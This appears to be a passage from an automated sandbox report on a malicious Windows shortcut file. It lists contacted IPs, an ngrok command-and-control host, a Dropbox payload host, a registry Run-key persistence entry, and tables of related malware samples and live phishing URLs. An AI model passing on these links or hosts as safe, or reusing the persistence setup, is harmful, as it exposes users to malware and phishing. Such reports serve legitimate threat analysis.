                                                                                                                                                                                                                                  https://permanently-removed.invalid/MergeSessionmsedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.compowershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                    http://anglebug.com/4937msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://issuetracker.google.com/166809097msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        http://issuetracker.google.com/200067929msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high

                                                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                          162.125.65.18
                                                                                                                                                                                                                                          		www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                                                          		19679DROPBOXUSfalse
                                                                                                                                                                                                                                          162.125.69.15
                                                                                                                                                                                                                                          		edge-block-www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                                                          		19679DROPBOXUSfalse
                                                                                                                                                                                                                                          142.250.181.65
                                                                                                                                                                                                                                          		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                                                                                                                          104.161.43.18
                                                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                                                          		53755IOFLOODUStrue
                                                                                                                                                                                                                                          172.64.41.3
                                                                                                                                                                                                                                          		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                                                          		unknownReserved
                                                                                                                                                                                                                                          		unknownunknownfalse
                                                                                                                                                                                                                                          3.125.209.94
                                                                                                                                                                                                                                          		7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appUnited States
                                                                                                                                                                                                                                          		16509AMAZON-02USfalse

                                                                                                                                                                                                                                          Private

                                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                                          192.168.2.7
                                                                                                                                                                                                                                          192.168.2.4
                                                                                                                                                                                                                                          192.168.2.6
                                                                                                                                                                                                                                          127.0.0.1

                                                                                                                                                                                                                                          General Information

                                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                          Analysis ID:1572662
                                                                                                                                                                                                                                          Start date and time:2024-12-10 18:39:11 +01:00
                                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                          Overall analysis duration:0h 10m 31s
                                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                          Number of analysed new started processes analysed:37
                                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                                          Sample name:taCCGTk8n1.lnk
                                                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                                                          Original Sample Name:48ea3e8097aa3314fc7fbfb73abdc072031989ef9ba14ff669d40c0633d13845.lnk
                                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                                          Classification:mal100.troj.evad.winLNK@86/284@21/11
                                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                                          • Successful, ratio: 33.3%
                                                                                                                                                                                                                                          HCA Information:Failed
                                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                                          • Found application associated with file extension: .lnk

                                                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 192.229.221.95, 199.232.210.172, 13.107.42.16, 172.217.19.238, 204.79.197.239, 13.107.21.239, 13.107.6.158, 104.110.240.201, 104.110.240.232, 2.16.158.83, 2.16.158.192, 2.16.158.184, 2.16.158.186, 2.16.158.35, 2.16.158.49, 2.16.158.74, 2.16.158.97, 2.16.158.185, 13.87.96.169, 23.218.208.109, 20.42.65.92, 52.182.143.212, 142.250.65.227, 142.250.72.99, 142.251.40.99, 13.107.246.63, 52.149.20.212, 94.245.104.56, 4.249.200.148, 13.107.246.40, 23.55.235.251, 23.57.90.133, 20.190.181.5
                                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, edgeassetservice.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, www.gstatic.com, l-0007.l-msedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, edgeassetservice.azureedge.net, umwatson.events.data.microsoft.com, clients.l.google.com, config.edge.skype.com.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, www.b
                                                                                                                                                                                                                                          • Execution Graph export aborted for target 1718218388.exe, PID 4236 because there are no executed function
                                                                                                                                                                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 8560 because there are no executed function
                                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 6976 because it is empty
                                                                                                                                                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 712 because it is empty
                                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                          • VT rate limit hit for: taCCGTk8n1.lnk

                                                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                                          12:40:04API Interceptor179x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                          12:40:23API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                          12:41:24API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                          18:41:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DiskTuner C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exe
                                                                                                                                                                                                                                          18:41:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DiskTuner C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exe

                                                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                                                          IPs

                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                          162.125.65.18Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                            ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                              QD40FIJ8QK.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  https://t.ly/HThl-Link1-0312Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    hnskldjf230.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                      kjsdfhsdHndf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                        hkjsdhf01.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                          kjshdfj_ksdf02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                            sjadhfkjshd0de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                              239.255.255.250Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                CMK7DB5YtR.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                  XrQ8NgQHTn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                    https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.comGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                      FG Or#U00e7amento JAN 2025.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                        https://lovesolvingastrologer.com/n/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9Y2tGd05VYz0mdWlkPVVTRVIwMzEyMjAyNFUwNzEyMDMyMQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          https://desactivacion-correo.s3.eu-north-1.amazonaws.com/es.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            https://app.droplet.io/form/Ko1loyGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              http://riginaros.blogspot.com/#x034rT96G0Get hashmaliciousPorn ScamBrowse
                                                                                                                                                                                                                                                                                https://8lye.zemifor.ru/AELKFIZNEFDBTAHDVVECCPNIETD459FBOSL3MNKP6ZQ?akpsmqmipdifvgvgwktrpvk235317236085203wfjcuo8jl4u8d22sbGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  172.64.41.3Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                      https://listafrica.org/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                                                                                                        Msig Insurance Europe.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                            https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                  BACS190027-01.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    my2gf4tNEk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      162.125.69.15Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                        interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                                                          zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                            https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                              https://t.ly/HThl-Link1-0312Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                https://dl.dropboxusercontent.com/scl/fi/zwwtq189ncebo2kcft2qa/Nulo-PPC-Tracking-Report-2025.zip?rlkey=lvid9bjy47pkluerl2jbf5wun&st=bhhac8iv&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                  Rechnung-Kfz.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                    https://wingfireconection.com/002585qasdASDLJMQPK00lERDGhklkcvTJggj.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                      https://wingfireconection.com/002585qasdASDLJMQPK00lERDGhklkcvTJggj.comGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                        fg.microsoft.map.fastly.netRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                                                                                                        EgnyteDesktopApp_3.17.1_144.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                                                                                                        sF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                                                                                                        oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                                                                                                        9aTcxCmLgM.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                                                                                                        4l5IFxl9t3.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                                                                                                        Readme.lnk.download.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                                                                                                        098aPtSbmd.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                                                                                                        loader.ps1.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                                                                                                        Documenti relativi alla violazione dei diritti di propriet#U00e0 intellettuale.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                                                                                                        7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 18.192.31.165
                                                                                                                                                                                                                                                                                                                        chrome.cloudflare-dns.comRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                                                                        1733845413a1d8742853c308d6ac4d050f80c4b91bf14f4919c2728222ecef14ce82d51adb973.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                                                                        nanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                                                                                        https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4IGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                                                                        List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                                                                        ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                                                                        my2gf4tNEk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                                                                                        my2gf4tNEk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                                                                        17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                                                                                        sF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                                                                                                                        s-part-0012.t-0009.t-msedge.netvQu0zndLpi.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 13.107.246.40
                                                                                                                                                                                                                                                                                                                        mtbkkesfthae.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                                        • 13.107.246.40
                                                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                        • 13.107.246.40
                                                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 13.107.246.40
                                                                                                                                                                                                                                                                                                                        https://www.cognitoforms.com/f/fWhXKikFUk-rIZ2zs1gjVw/1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 13.107.246.40
                                                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                        • 13.107.246.40
                                                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                                                                        • 13.107.246.40
                                                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                                        • 13.107.246.40
                                                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                                        • 13.107.246.40
                                                                                                                                                                                                                                                                                                                        http://iglawfirm.com/services/antai-fr/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 13.107.246.40

                                                                                                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                        DROPBOXUSRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                                                                                                                        interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                                                                                                                        Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                                                                                                                        zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                                                                                                                        ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                                                                                                                        kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                                                                                                                        kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                                                                                                                        kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                                                                                                                        7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                                                                                                                        kjshdkfgjsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                                                                                                                        CLOUDFLARENETUSRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                                                                                                                        CMK7DB5YtR.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                                                                                                                                                                        XrQ8NgQHTn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                                                                                                                                                                        https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.comGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                                                                                                                                        • 172.67.145.201
                                                                                                                                                                                                                                                                                                                        9coWg6ayLz.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 162.159.140.238
                                                                                                                                                                                                                                                                                                                        Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                                                                                        • 188.114.97.6
                                                                                                                                                                                                                                                                                                                        UFS0yWUTWR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 172.66.0.236
                                                                                                                                                                                                                                                                                                                        xrv3PCeWDV.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 162.159.140.238
                                                                                                                                                                                                                                                                                                                        K2B1CPXWSc.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 104.16.77.47
                                                                                                                                                                                                                                                                                                                        HwFciuum6M.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 172.66.0.236
                                                                                                                                                                                                                                                                                                                        DROPBOXUSRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                                                                                                                        interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                                                                                                                        Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                                                                                                                        zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                                                                                                                        ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                                                                                                                        kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                                                                                                                        kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                                                                                                                        kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                                                                                                                        7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                                                                                                                        kjshdkfgjsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                                                                                                                        IOFLOODUSRevo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 107.167.96.30
                                                                                                                                                                                                                                                                                                                        Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 107.167.96.30
                                                                                                                                                                                                                                                                                                                        06.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                                                        • 107.178.108.41
                                                                                                                                                                                                                                                                                                                        sdfg.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                                                                        • 107.178.108.41
                                                                                                                                                                                                                                                                                                                        teste.arm.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                                                                                                                                                                                                                                                                                        • 184.164.88.203
                                                                                                                                                                                                                                                                                                                        https://www.upload.ee/files/17435967/DeltaAirLines_t.delta.com.txt.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 107.167.96.30
                                                                                                                                                                                                                                                                                                                        nabarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 148.163.47.37
                                                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                        • 148.163.93.46
                                                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                                                                                                                                                        • 148.163.93.46
                                                                                                                                                                                                                                                                                                                        IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                                                                                                                                        • 107.167.84.42

                                                                                                                                                                                                                                                                                                                        JA3 Fingerprints

